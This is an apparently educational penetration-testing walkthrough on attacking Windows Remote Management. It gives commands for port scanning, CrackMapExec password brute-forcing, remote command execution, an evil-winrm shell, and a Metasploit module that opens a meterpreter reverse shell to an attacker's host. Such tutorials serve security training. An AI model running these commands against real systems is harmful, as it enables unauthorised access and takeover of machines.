Exploiting WinRM

Exploiting WinRM

• Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access with Windows systems over HTTP(S)

• Microsoft implemented WinRM in to Windows in order to make life easier for system administrators.

• WinRM is typically used in the following ways:

  • Remotely access and interact with Windows hosts on a local network.

  • Remotely access and execute commands on Windows systems.

  • Manage and configure Windows systems remotely.

• WinRM typically uses TCP port 5985 and 5986 (HTTPS).

• WinRM implements access control and security for communication between systems through various forms of authentication.

• We can utilize a utility called “crackmapexec” to perform a brute-force on WinRM in order to identify users and their passwords as well as execute commands on the target system.

• We can also utilize a ruby script called “evil-winrm” to obtain a command shell session on the target system.

Attack Flow for WinRM - Brute Force

1. Discover Open Ports

Objective: Identify open ports on the target server.

Command:

nmap -sV -p- <Target_IP>

Description: Use Nmap to perform a comprehensive scan of all ports on the target server and determine the versions of the services running on them.

2. Confirm Open Ports Using CrackMapExec

Objective: Verify the open ports and service versions using CrackMapExec.

Command:

crackmapexec smb <Target_IP>

Description: Use CrackMapExec to confirm the open ports and running services on the target server.

3. Brute Force Attack on WinRM

Objective: Obtain valid credentials for WinRM (Windows Remote Management) service.

Command:

crackmapexec winrm <Target_IP> -u <username> -p <pass_list_path>

Description: Use CrackMapExec to perform a brute force attack on the WinRM service with the provided username and password list.

4. Execute Commands on Target System

Objective: Run commands on the target system using obtained credentials.

Command:

crackmapexec winrm <Target_IP> -u <username> -p <password> -x "<cmd_to_run>"

Description: Use CrackMapExec to execute specific commands on the target system with the obtained username and password.

5. Establish a Shell Using Evil-WinRM

Objective: Get a stable shell on the target system.

Command:

evil-winrm.rb -u <username> -p '<password>' -i <Target_IP>

Description: Use the evil-winrm.rb script to establish a stable shell on the target system with the obtained credentials.

6. Alternative Method Using Metasploit

Objective: Use Metasploit to achieve a stable shell on the target system.

Command:

msfconsole
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <Target_IP>
set USERNAME <username>
set PASSWORD <password>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the winrm_script_exec module in Metasploit to exploit WinRM and establish a Meterpreter session on the target system.

Hacker's Mantra:When hackers have access to powerful computers that use brute force hacking, they can crack almost any password; even one user with insecure access being successfully hacked can result in a major breach. - Toomas Hendrik Ilves